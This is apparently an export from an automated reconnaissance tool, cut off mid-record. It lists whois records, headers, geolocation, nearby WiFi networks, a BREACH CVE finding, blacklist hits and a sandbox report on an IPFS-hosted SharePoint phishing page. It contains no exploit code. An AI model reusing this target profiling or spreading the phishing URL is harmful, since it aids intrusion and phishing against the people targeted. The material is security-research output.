"https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-MoFoq92mg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNDrMfJg.woff"\n Pattern match: "MUID06AC37517CFB670117FF258C7DB766BBmsn.com/1025424501094431100936425263449231022473*"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://ikerguerrero.dev/Accept-Language"\n Pattern match: "https://csp.withgoogle.com/csp/apps-themesCross-Origin-Resource-Policy"\n Pattern match: "http://ikerguerrero.dev"\n Pattern match: "http://ikerguerrero.dev/"\n Pattern match: "isdomainmigratedtruewww.msn.com/102584346316831058692425247824231022473*"\n Pattern match: "MUIDB1EE4D163B6736F882F96C3BEB73F6EBEieonline.microsoft.com/9216424501094431100936424779074231022473*"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI6MX1D_JOuGQbT0gvTJPa787weuxJBkqs.woff"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI6MX1D_JOuGQbT0gvTJPa787z5vBJBkqs.woff"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-C0Coq92mg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4bbLDrMfJg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLDrMfJg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejLDrMf |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-served-by: cache-lga21982-LGA | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:11:20 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean, LLC', u'organization_name': u'DigitalOcean, LLC', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'05:11:19'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'165.232.113.85', u'continent': u'Europe', u'region_iso_code': u'HE'} | 165.232.113.85 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Calendy (Category: misc)
https://calendly.com/ayhu | ayhu |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:87:91) | 37.7813933,-122.3918002 |
| 2023-05-12 03:17:34 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: https://idwebhost.com
Updated Date: 2023-02-06T12:49:42.0Z
Creation Date: 2023-02-01T09:45:59.0Z
Registry Expiry Date: 2024-02-01T23:59:59.0Z
Registrar: CV Jogjacamp
Registrar IANA ID: 1478
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.CPHOSTINGWORLD.NET
Name Server: NS2.CPHOSTINGWORLD.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:34.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: http://resellercamp.com/
Updated Date: 2023-02-01T09:46:29Z
Creation Date: 2023-02-01T09:45:59Z
Registrar Registration Expiration Date: 2024-02-01T23:59:59Z
Registrar: CV. Jogjacamp
Registrar IANA ID: 1478
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
Domain Status: clientTransferProhibited (http://icann.org/epp#clientTransferProhibited)
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Name Server: ns1.cphostingworld.net
Name Server: ns2.cphostingworld.net
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:02:34Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
Registration Service Provided By: RESELL CORE
The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is CV. Jogjacamp.
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
| ayshu.xyz |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.135.9 |
| 2023-05-12 03:05:12 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | fluid.battleb0t.xyz |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.150): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.19): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.221): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TB Proprietary Channel. Bc (Net ID: 00:04:32:1C:D9:49) | 39.0469, -77.4903 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bursa (Net ID: 00:08:5C:7B:38:A1) | 40.2024, 29.0398 |
| 2023-05-12 02:45:31 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.110.153 |
| 2023-05-12 03:03:27 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | nwapi.battleb0t.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Iceland | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.218): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SENSEO2 (Net ID: 00:01:24:F2:7F:EC) | 52.3759, 4.8975 |
| 2023-05-12 02:45:31 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.111.153]
| 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Verorouter5 (Net ID: DC:EF:09:A7:2C:2E) | 37.751, -97.822 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Amethyst (Net ID: 00:01:21:30:76:B8) | 41.8781, -87.6298 |
| 2023-05-12 02:52:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b74_IESQMMUTEX_0_519"\n "IsoScope_b74_IESQMMUTEX_0_303"\n "IsoScope_b74_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b74_ConnHashTable<2932>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2932"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b74_IE_EarlyTabStart_0xc60_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2932"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"209.94.90.1:443"\n "185.199.108.153:443"\n "69.16.175.42:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link"\n "code.jquery.com"\n "lipis.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-play:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df286b44a707b3eea4.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c1c29ba3-ece3-11ed-850a-0800273c6f77}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df286b44a707b3eea4.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c1c29ba3-ece3-11ed-850a-0800273c6f77}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df357091913e855084.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c1c29ba5-ece3-11ed-850a-0800273c6f77}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsbafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.linksharepoint.html" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "jquery-1.9.1_1_.js" has type "ASCII text"- [targetUID: N/A]\n "fontawesome-webfont_3_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "CabBE9.tmp" has type "data"- Location: [%TEMP%\\CabBE9.tmp]- [targetUID: 00000000-00003580]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002932]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF357091913E855084.TMP" has type "data"- Location: [%TEMP%\\~DF357091913E855084.TMP]- [targetUID: 00000000-00002932]\n "~DFC8DC73F59F20B03D.TMP" has type "data"- Location: [%TEMP%\\~DFC8DC73F59F20B03D.TMP]- [targetUID: 00000000-00002932]\n "~DFFA05555E5F75317E.TMP" has type "data"- Location: [%TEMP%\\~DFFA05555E5F75317E.TMP]- [targetUID: 00000000-00002932]\n "~DF286B44A707B3EEA4.TMP" has type "data"- Location: [%TEMP%\\~DF286B44A707B3EEA4.TMP]- [targetUID: 00000000-00002932]\n "RecoveryStore._C1C29BA3-ECE3-11ED-850A-0800273C6F77_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C1C29BA5-ECE3-11ED-850A-0800273C6F77_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "_CCB1F27E-ECE3-11ED-850A-0800273C6F77_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "CZDM0KJA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CZDM0KJA.txt]- [targetUID: 00000000-00002932]\n "K3LFSBDJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\K3LFSBDJ.txt]- [targetUID: 00000000-00002932]\n "SEQRGNLL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SEQRGNLL.txt]- [targetUID: 00000000-00002932]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003580]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "Q2MIS3ZH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Q2MIS3ZH.txt]- [targetUID: 00000000-00002932]\n "NRVCHGTI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NRVCHGTI.txt]- [targetUID: 00000000-00002932]\n "ED47IPG9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ED47IPG9.txt]- [targetUID: 00000000-00002932]\n "X8T16EV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X8T16EV3.txt]- [targetUID: 00000000-00002932]\n "sharepoint_1_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003580]\n "CabC58.tmp" has type "data"- Location: [%TEMP%\\CabC58.tmp]- [targetUID: 00000000-00003580]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"query.prod.cms.msn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in bina | 185.199.108.153 |
